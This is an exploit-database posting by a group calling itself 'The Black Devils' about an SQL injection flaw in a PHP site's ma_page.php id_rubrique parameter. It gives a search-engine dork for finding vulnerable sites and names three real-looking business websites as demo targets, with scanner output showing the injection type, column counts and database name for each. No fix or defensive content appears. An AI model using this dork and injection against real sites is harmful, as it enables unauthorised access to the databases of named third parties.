facebook facebook twitter rss

Applications Services sql injection Vulnerability

Author: The Black Devils , Published: 30-09-2012
# Exploit Title: Applications Services sql injection Vulnerability
# Date: 27/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.tres-net.com/
# Category : [ webapps ]
# Dork : inurl:ma_page.php?id_rubrique=
# Type : php
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\page.php?PageId= sql injection
-------------------------------
# Demo site:
Analyzing http://www.ferme-chalets-cantal.com/ma_page.php?id_rubrique=376
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.3.2-1ubuntu4.18
Keyword Found: #4A4FAA;
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 9
Valid String Column is 3
Current DB: applicat
--------------
Analyzing http://www.hotel-les-messageries.com/ma_page.php?id_rubrique=519
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.3.2-1ubuntu4.18
Keyword Found: menus
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 9
Valid String Column is 3
Current DB: applicat
-------------
Analyzing http://www.restaurant-reugny.com/ma_page.php?id_rubrique=655
Web Server: Apache/2.2.14 (Ubuntu)
Powered-by: PHP/5.3.2-1ubuntu4.18
Keyword Found: Recettes
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 9
Valid String Column is 3
Current DB: applicat
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Mohamed Rassoul Allah

Like us on Facebook :